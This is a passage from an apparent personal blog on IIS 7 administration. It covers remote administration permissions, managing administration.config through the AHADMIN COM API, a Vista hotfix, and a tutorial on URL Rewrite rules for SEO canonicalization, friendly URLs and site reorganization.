      icacls %windir%\system32\inetsrv\config\administration.config /grant "IIS AppPool\WebMgmtAppPool":(R)
  6. At this point you should be able to navigate to your application using any browser and you should get a prompt for credentials that will be authenticated against the IIS Manager Users.

What is also nice is that you can use URL Authorization to further restrict access to your pages for these users. For example, if I didn't want a particular IIS Manager User (say MyIisManagerUser) to access the Web Site, I could just configure this in the same web.config:

<configuration>
  <system.webServer>
    <security>
      <authorization>
        <add accessType="Deny" users="MyIisManagerUser" />
      </authorization>
    </security>
  </system.webServer>
</configuration>

If you want to learn more about remote administration and how to configure it you can read: http://learn.iis.net/page.aspx/159/configuring-remote-administration-and-feature-delegation-in-iis-7/


AHADMIN is the COM API that IIS 7.0 uses for reading and writing its configuration system. One of its lesser-known features is that you can also use the same API to manage Administration.config by calling the SetMetadata method and specifying that you are targeting Administration.config. Under the covers this uses a built-in IAppHostPathMapper that re-maps the files so that you can manage Administration.config easily.

Here is an example of a common operation that adds a ModuleProvider (UI Extensibility Module) and its corresponding Module.


// Create a Configuration System for modifying Administration.config
var adminManager = new ActiveXObject("Microsoft.ApplicationHost.WritableAdminManager");
adminManager.CommitPath = "MACHINE/WEBROOT";
adminManager.SetMetadata("pathMapper", "AdministrationConfig");

// add the module in the moduleProviders section
AddModuleProvider(adminManager, "myIISModule", "myIISModuleUI, Version=1.0.0.0, Culture=neutral, PublicKeyToken=YourPublicKey");

// add the module in the modules section
AddModule(adminManager, "myIISModule");

// commit changes
adminManager.CommitChanges();


function AddModuleProvider(adminManager, name, type) {
    var moduleProvidersSection = adminManager.GetAdminSection("moduleProviders", "MACHINE/WEBROOT");

    var moduleProviders = moduleProvidersSection.Collection;

    // if already exists, do nothing
    var addElementPos = FindElement(moduleProviders, "add", ["name", name]);
    if (addElementPos != -1) return;

    var moduleProvider = moduleProviders.CreateNewElement("add");
    moduleProvider.Properties.Item("name").Value = name;
    moduleProvider.Properties.Item("type").Value = type;

    moduleProviders.AddElement(moduleProvider);
}

// if already exists, do nothing
function AddModule(adminManager, name) {
    var modulesSection = adminManager.GetAdminSection("modules", "MACHINE/WEBROOT");

    var modules = modulesSection.Collection;

    // See if already exists
    var addElementPos = FindElement(modules, "add", ["name", name]);
    if (addElementPos != -1) return;

    var module = modules.CreateNewElement("add");
    module.Properties.Item("name").Value = name;

    modules.AddElement(module);
}

// Helper function to find an element in a collection based on the specified attributes
function FindElement(collection, elementTagName, valuesToMatch) {
    for (var i = 0; i < collection.Count; i++) {
        var element = collection.Item(i);

        if (element.Name == elementTagName) {
            var matches = true;
            for (var iVal = 0; iVal < valuesToMatch.length; iVal += 2) {
                var property = element.GetPropertyByName(valuesToMatch[iVal]);
                var value = property.Value;
                if (value != null) {
                    value = value.toString();
                }
                if (value != valuesToMatch[iVal + 1]) {
                    matches = false;
                    break;
                }
            }
            if (matches) {
                return i;
            }
        }
    }

    return -1;
}

I'll use this time to also mention that it is very important to add the module to the modules section if you want it to be available in Site and Application delegated connections; otherwise only Server connections will get it.


Every now and then after leaving my computer running for several weeks I would get a weird error message when trying to launch Excel saying something like:

C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE is not a valid Win32 application.

or

This file does not have a program associated with it for performing this action. Create an association in the Set Associations control panel.

I tried several things to make it run again, but only restarting would solve the problem. Finally, I decided to investigate a bit more, and it turns out there is a fix for the problem that you can download from Microsoft support:

http://support.microsoft.com/kb/952709

This update improves the reliability of Windows Vista SP1-based computers that experience issues in which large applications cannot run after the computer is turned on for extended periods of time. For example, when you try to start Excel 2007 after the computer is turned on for extended periods of time, a user may receive an error message that resembles the following:

EXCEL.EXE is not a valid Win32 application

I just installed it and so far so good, no more weird errors, but I guess I need to wait a few weeks before I can testify that it works. Either way, I thought this could be helpful for others.

Direct links for the fix download are:

Windows Vista, 32-bit versions
Download the Update for Windows Vista (KB952709) package now. (http://www.microsoft.com/downloads/details.aspx?FamilyId=DF72A9B0-564E-4326-894E-05CBA709CB39)
Windows Vista, 64-bit versions
Download the Update for Windows Vista for x64-based Systems (KB952709) package now. (http://www.microsoft.com/downloads/details.aspx?FamilyId=C3536CAA-7B71-4525-9D23-21A5B3D4507F)

In the past few days I've been reading a bit about SEO, trying to understand what makes a Web Site search-engine optimized (SEO), what some of the typical headaches are when trying to achieve that, and how we can address them in IIS.

Today I decided to post how you can make your Web Site running IIS 7.0 a bit "friendlier" to search engines without having to modify any code in your application. Being SEO is a big statement since it can include several things, so for now I will scope the discussion to three things that can be easily addressed using the IIS URL Rewrite Module:

  1. Canonicalization
  2. Friendly URL's
  3. Site Reorganization

1) Canonicalization

Basically, the goal of canonicalization is to ensure that the content of a page is exposed under a single, unique URI. This is important because, even though it's easy for humans to tell that http://www.carlosag.net is the same as http://carlosag.net, many search engines will not make any assumptions and will keep them as two separate entries, potentially splitting the ranking between them and lowering their relevance. Another example of this is http://www.carlosag.net/default.aspx and http://www.carlosag.net/. You can certainly minimize the impact by always using the canonical form in your own links, for example linking to http://www.carlosag.net/tools/webchart/ without the default.aspx. However, that only accounts for part of the equation, since you cannot control the links on other sites that reference yours.

This is when URL Rewrite comes into play and truly solves this problem.

Host name.

URL Rewrite can help you redirect users when they type your URL in a form you don't necessarily want them to use, for example just carlosag.net. Choosing between using WWW or not is a matter of taste, but once you choose one you should ensure that you guide everyone to the right one. The following rule will automatically redirect everyone using just carlosag.net to www.carlosag.net. This configuration can be saved in the Web.config file in the root of your Web Site. Note that I'm only including the XML in this blog; I used IIS Manager to generate all of these settings, so you don't need to memorize the XML schema, since the UI includes several friendly capabilities to generate all of this.

<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="Redirect to WWW" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <add input="{HTTP_HOST}" pattern="^carlosag\.net$" />
          </conditions>
          <action type="Redirect" url="http://www.carlosag.net/{R:0}" redirectType="Permanent" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>

One important thing to note is the use of Permanent (301) redirects. This ensures that if anybody links to your page using a non-WWW link, a search engine bot crawling their Web Site will identify the link as permanently moved, treat the new URL as the correct address, and not index the old URL, which is what would happen with a Temporary (302) redirect. The following shows what the server's response looks like:

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://www.carlosag.net/tools/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 01 Sep 2008 22:45:49 GMT
Content-Length: 155

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF=http://www.carlosag.net/tools/>here</a></body>
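
To make the evaluation order concrete, here is a minimal JavaScript sketch of what the host name rule does for a single request. It is only a model of the rule, not the URL Rewrite engine; the function name canonicalHostRedirect is made up for illustration, and the sketch assumes the host header carries no port number.

```javascript
// Model of the "Redirect to WWW" rule: returns the redirect to issue,
// or null when the rule does not apply. (Hypothetical helper, not an IIS API.)
function canonicalHostRedirect(host, path) {
  // Condition: {HTTP_HOST} must be exactly the bare domain.
  // The test is case-insensitive, as condition patterns are by default.
  if (!/^carlosag\.net$/i.test(host)) {
    return null;
  }
  // match url=".*" captures the whole path, without the leading slash, as {R:0}.
  const r0 = path.replace(/^\//, "");
  return { status: 301, location: "http://www.carlosag.net/" + r0 };
}

console.log(canonicalHostRedirect("carlosag.net", "/tools/"));
console.log(canonicalHostRedirect("www.carlosag.net", "/tools/"));
```

The first call yields a 301 pointing at http://www.carlosag.net/tools/, matching the response shown above; the second returns null because the host is already canonical.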

Default Documents

IIS has a feature called Default Document that allows you to specify the content that should be processed when a user enters a URL that maps to a directory and not an actual file. In other words, if the user enters http://www.carlosag.net/tools/ they will actually get the content as if they had entered http://www.carlosag.net/tools/default.aspx. That is all great; the problem is that this feature only works one way, mapping a directory to a file. It does not map the file back to the directory, which means that if some of your links, or other users, use the full URL, search engines will see two different URLs. To solve that problem we can use a configuration very similar to the rule above. The following rule redirects default.aspx to the canonical URL (the folder).

        <rule name="Default Document" stopProcessing="true">
          <match url="^(.*/)?default\.aspx$" />
          <action type="Redirect" url="{R:1}" redirectType="Permanent" />
        </rule>

Again, this uses a Permanent redirect, extracting everything before default.aspx and redirecting to the "parent" URL path. For example, if the user enters http://www.carlosag.net/Tools/WindowsLiveWriter/default.aspx they will be redirected to http://www.carlosag.net/Tools/WindowsLiveWriter/, and http://www.carlosag.net/Tools/default.aspx will be redirected to http://www.carlosag.net/Tools/. You can place this rule at the root of your site and it will take care of all the default documents (if you have a default.aspx in every folder).
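
The capture group is the part that does the work here, so a small JavaScript sketch of it may help. The pattern below is my own stricter variant: it escapes the dot and anchors both ends so that a file such as mydefault.aspx is left alone. The helper name defaultDocumentRedirect is hypothetical, and the input is the path without its leading slash, which is how the rule sees it.

```javascript
// Returns the folder URL to redirect to, or null when the path is not a
// default document. (Illustrative helper only.)
function defaultDocumentRedirect(path) {
  const m = /^(.*\/)?default\.aspx$/i.exec(path);
  if (!m) {
    return null;
  }
  // m[1] plays the role of {R:1}: everything before default.aspx.
  // It is undefined for a default.aspx at the site root.
  return "/" + (m[1] || "");
}

console.log(defaultDocumentRedirect("Tools/WindowsLiveWriter/default.aspx"));
console.log(defaultDocumentRedirect("Tools/mydefault.aspx"));
```

The first call maps to the folder /Tools/WindowsLiveWriter/, while the second returns null because the file name only ends in default.aspx.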

2) Friendly URL's

Asking your users to remember that www.contoso.com/books.aspx?isbn=0735624410 is the URL for the IIS Resource Kit is not the nicest thing to do. First of all, why should they care that this is an ASPX page, or that it takes arguments? A URL like www.contoso.com/books/IISResourceKit will resonate with them much more and be easier to remember and pass along. Most importantly, it doesn't tie you to any Web technology.

With URL Rewrite you can easily build this kind of logic using Rewrite Maps, without having to modify your code:

<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="Rewrite for Books" stopProcessing="true">
          <match url="Books/(.+)" />
          <action type="Rewrite" url="books.aspx?isbn={Books:{R:1}}" />
        </rule>
      </rules>
      <rewriteMaps>
        <rewriteMap name="Books">
          <add key="IISResourceKit" value="0735624410" />
          <add key="ProfessionalIIS7" value="0470097825" />
          <add key="IIS7AdministratorsPocketConsultant" value="0735623643" />
          <add key="IIS7ImplementationandAdministration" value="0470178930" />
        </rewriteMap>
      </rewriteMaps>
    </rewrite>
  </system.webServer>
</configuration>

The configuration above includes a rule that uses a Rewrite Map to translate a URL like http://www.contoso.com/books/IISResourceKit into http://www.contoso.com/books.aspx?isbn=0735624410 automatically. Maps are a very convenient way to have a "table" of values that can be transformed into any other value to be used in the resulting URL. Of course there are better ways of doing this for large catalogs or values that change frequently, but it is extremely useful when you have a stable set of values or when you can't make changes to an existing application. Note that since we use Rewrite, end users never see the "ugly URL" unless they already knew it and typed it. Of course, this means you can use the inverse approach to ensure that canonicalization is preserved:

    <rewrite>
      <rules>
        <rule name="Redirect Books to Canonical URL" stopProcessing="true">
          <match url="books\.aspx" />
          <action type="Redirect" url="Books/{ISBN:{C:1}}" appendQueryString="false" />
          <conditions>
            <add input="{QUERY_STRING}" pattern="isbn=(.+)" />
          </conditions>
        </rule>
      </rules>
      <rewriteMaps>
        <rewriteMap name="ISBN">
          <add key="0735624410" value="IISResourceKit" />
          <add key="0470097825" value="ProfessionalIIS7" />
          <add key="0735623643" value="IIS7AdministratorsPocketConsultant" />
          <add key="0470178930" value="IIS7ImplementationandAdministration" />
        </rewriteMap>
      </rewriteMaps>
    </rewrite>

The rule above does the "inverse": it matches the URL books.aspx, extracts the ISBN query string value, looks it up in the ISBN table, and redirects the client to the canonical URL. So again, if a user enters http://www.contoso.com/books.aspx?isbn=0735624410 they will be redirected to http://www.contoso.com/books/IISResourceKit.
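
The two maps are mirror images of each other, which a short JavaScript sketch can make explicit. This is a model of the two rules, not the module itself: the function names are invented, only two of the four books are listed to keep it short, and it assumes that a key missing from a map yields an empty string and that keys are compared with exact case.

```javascript
// Forward map (friendly name -> ISBN), as in the "Books" rewrite map.
const books = new Map([
  ["IISResourceKit", "0735624410"],
  ["ProfessionalIIS7", "0470097825"],
]);
// Inverse map (ISBN -> friendly name), derived instead of typed twice.
const isbns = new Map([...books].map(([name, isbn]) => [isbn, name]));

// Models the Rewrite rule: Books/<name> -> books.aspx?isbn=<isbn>
function rewriteFriendlyUrl(path) {
  const m = /Books\/(.+)/i.exec(path);
  if (!m) return null;
  return "books.aspx?isbn=" + (books.get(m[1]) || "");
}

// Models the Redirect rule: books.aspx?isbn=<isbn> -> Books/<name>
function redirectToCanonical(path, queryString) {
  if (!/books\.aspx/i.test(path)) return null;
  const c = /isbn=(.+)/i.exec(queryString);
  if (!c) return null;
  // An unknown ISBN produces "Books/" here, mirroring the empty lookup.
  return "Books/" + (isbns.get(c[1]) || "");
}

console.log(rewriteFriendlyUrl("books/IISResourceKit"));
console.log(redirectToCanonical("books.aspx", "isbn=0735624410"));
```

Deriving the inverse map from the forward one is a convenience of the sketch; in Web.config both maps have to be kept in sync by hand.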

To me, friendly URLs are more of a user feature than an SEO feature. Every SEO guide I've read recommends reducing the number of parameters in your query string; however, I have not yet found any document that clearly states whether there is truly a limit in the search engine bots that would impact search relevance. I guess it makes sense that they wouldn't keep track of thousands of links to a catalog.aspx that has zillions of permutations based on hundreds of values in the query string (category, department, price range, etc.) even if all of them were linked, but again I don't have any proof.

3) Site Reorganization

One complex task that Web developers sometimes face is reorganizing their current Web Site structure. Whether it's moving a section to a different path or something as simple as renaming a single file, you need to consider things like: Is this move temporary? How do I ensure old clients get the new URL? How do I avoid losing search engine relevance? URL Rewrite will help you perform these tasks.

Rename a file

If you rename a file, you can very easily write a Rewrite or Redirect rule that ensures your users continue getting the content. If your intent is to never go back to the old name, you should use a Permanent redirect so everyone starts getting the new content at its new "canonical URL". If this could be a temporary change, you should use a Temporary redirect. Finally, a Rewrite is useful if you want both URLs to continue to be valid (though this breaks canonicalization).

        <rule name="Rename File.php to MyFile.aspx" stopProcessing="true">
          <match url="File\.php" />
          <action type="Redirect" url="MyFile.aspx" redirectType="Permanent" />
        </rule>

Moving directories

Another common scenario is when you need to move an entire directory to another place in the Web Site. It could also be that, based on some criteria (say mobile browsers or another User Agent), you want to serve a different set of pages or images. Either way, URL Rewrite helps with this. The following configuration will redirect every request for the /Images directory to the /NewImages directory.

        <rule name="Move Images to NewImages" stopProcessing="true">
          <match url="^images/(.*)" />
          <action type="Redirect" url="NewImages/{R:1}" redirectType="Permanent" />
        </rule>

A related scenario: if you wanted to show smaller images whenever a Windows CE user accesses your site, you could have an "img" directory where all the small images are stored and use a rule like the following:

        <rule name="Use Small Images for Windows CE" stopProcessing="true">
          <match url="^images/(.*)" />
          <action type="Rewrite" url="/img/{R:1}" />
          <conditions>
            <add input="{HTTP_USER_AGENT}" pattern="Windows CE" ignoreCase="false" />
          </conditions>
        </rule>

Note that in this case the use of Rewrite makes sense, since we want the small images to look like the original images to the browser, and it saves a round trip.

Moving multiple files

Another common operation is relocating assorted pages for whatever reason (such as marketing campaigns, branding, etc.). In this case, if you have several files that have been moved or renamed, you can have a single rule that catches all of them and redirects them accordingly. Similarly, another example is an incremental migration from one technology to another, say from Classic ASP to ASP.NET: as you rewrite some of the old ASP pages as ASPX pages, you want to start serving them without breaking any links or losing search engine relevance.

    <rewrite>
      <rules>
        <rule name="Redirect Old Files and Broken Links" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <add input="{OldFiles:{REQUEST_URI}}" pattern="(.+)" />
          </conditions>
          <action type="Redirect" url="{C:0}" />
        </rule>
      </rules>
      <rewriteMaps>
        <rewriteMap name="OldFiles">
          <add key="/tools/WebChart/sample.asp" value="tools/WebChart/sample.aspx" />
          <add key="/tools/default.asp" value="tools/" />
          <add key="/images/brokenlink.jpg" value="/images/brokenlink.png" />
        </rewriteMap>
      </rewriteMaps>
    </rewrite>

Now, you can just keep adding to this table any broken link and specify its new address.
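
The trick in this rule is that the condition input is itself a map lookup, and the pattern (.+) only matches a non-empty result. A minimal JavaScript sketch of that behavior, assuming that a key missing from the map produces an empty string (the function name redirectOldFile is made up):

```javascript
// Same entries as the "OldFiles" rewrite map.
const oldFiles = new Map([
  ["/tools/WebChart/sample.asp", "tools/WebChart/sample.aspx"],
  ["/tools/default.asp", "tools/"],
  ["/images/brokenlink.jpg", "/images/brokenlink.png"],
]);

// Returns the redirect target, or null when the request is not in the table.
function redirectOldFile(requestUri) {
  const mapped = oldFiles.get(requestUri) || ""; // missing key -> empty string
  const c = /(.+)/.exec(mapped);                 // fails on the empty string
  return c ? c[0] : null;                        // c[0] plays the role of {C:0}
}

console.log(redirectOldFile("/tools/default.asp"));
console.log(redirectOldFile("/tools/webchart/"));
```

Requests that are not listed fall through untouched, which is why a single catch-all rule with match url=".*" is safe here.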

Others

Another potential use of URL Rewrite is with RIA applications in the browser. Content built with things like AJAX, Silverlight or Flash is not easy for search engines to parse and index, so you could use URL Rewrite to rewrite the URL to static HTML versions of your content. However, you should make sure that the content is consistent so you don't mislead users and search engines. For example, the following rule will rewrite all the files in the RIAFiles table to their static HTML counterparts, but only if the User Agent is MSNBot or Googlebot:

    <rewrite>
      <rules>
        <rule name="Rewrite RIA Files" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <add input="{HTTP_USER_AGENT}" pattern="MSNBot|Googlebot" />
            <add input="{RIAFiles:{REQUEST_URI}}" pattern="(.+)" />
          </conditions>
          <action type="Rewrite" url="{C:0}" />
        </rule>
      </rules>
      <rewriteMaps>
        <rewriteMap name="RIAFiles">
          <add key="/samples/Silverlight.aspx" value="/samples/Silverlight.htm" />
          <add key="/samples/MyAjax.aspx" value="/samples/MyAjax.htm" />
        </rewriteMap>
      </rewriteMaps>
    </rewrite>

Related to this, you might want to prevent search engines from crawling certain files (or your entire site). For that you can use Robots.txt with a "Disallow" entry; however, you can also use URL Rewrite to do this with more control, such as blocking only a specific user agent:

    <rewrite>
      <rules>
        <rule name="Prevent access to files" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <add input="{HTTP_USER_AGENT}" pattern="SomeRandomBot" />
            <add input="{NonIndexedFiles:{REQUEST_URI}}" pattern="(.+)" />
          </conditions>
          <action type="AbortRequest" />
        </rule>
      </rules>
      <rewriteMaps>
        <rewriteMap name="NonIndexedFiles">
          <add key="/profile.aspx" value="block" />
          <add key="/personal.aspx" value="block" />
        </rewriteMap>
      </rewriteMaps>
    </rewrite>
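
Since this rule has two conditions, it is worth spelling out how they combine. As far as I understand the default grouping, every condition must match before the action runs, so the request is aborted only for the named bot and only for the listed files. A small JavaScript sketch of that logic (shouldAbort is a hypothetical name, and the missing-key-means-empty-string behavior is again an assumption):

```javascript
// Same entries as the "NonIndexedFiles" rewrite map.
const nonIndexedFiles = new Map([
  ["/profile.aspx", "block"],
  ["/personal.aspx", "block"],
]);

// True when the rule would abort the request.
function shouldAbort(userAgent, requestUri) {
  // Condition 1: the user agent contains the bot name (case-insensitive).
  const isBlockedBot = /SomeRandomBot/i.test(userAgent);
  // Condition 2: the map lookup returns something non-empty.
  const isProtectedFile = /(.+)/.test(nonIndexedFiles.get(requestUri) || "");
  // Both conditions have to hold (logical AND).
  return isBlockedBot && isProtectedFile;
}

console.log(shouldAbort("SomeRandomBot/1.0", "/profile.aspx"));
console.log(shouldAbort("SomeRandomBot/1.0", "/default.aspx"));
console.log(shouldAbort("Mozilla/5.0", "/profile.aspx"));
```

Only the first call reports an abort; a regular browser still reaches /profile.aspx, and the bot can still crawl pages that are not in the table.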

There are several other things you can do to ensure that your Web Site is friendly to search engines. Most of them require changes to your application but are certainly worth the effort, for example:

  • Ensure your HTML includes a <title> tag.
  • Ensure your HTML includes a <meta name="description"> tag.
  • Use the correct HTML semantics: use H1 once and only once, use the alt attribute in your <img> tags, use <noscript>, etc.
  • Redirect using status code 301 and not 302.
  • Provide Site Maps and/or Robots.txt.
  • Beware of postbacks and links that require script to run.

Resources

For this entry I read and used some of the resources at several Web Sites, including:
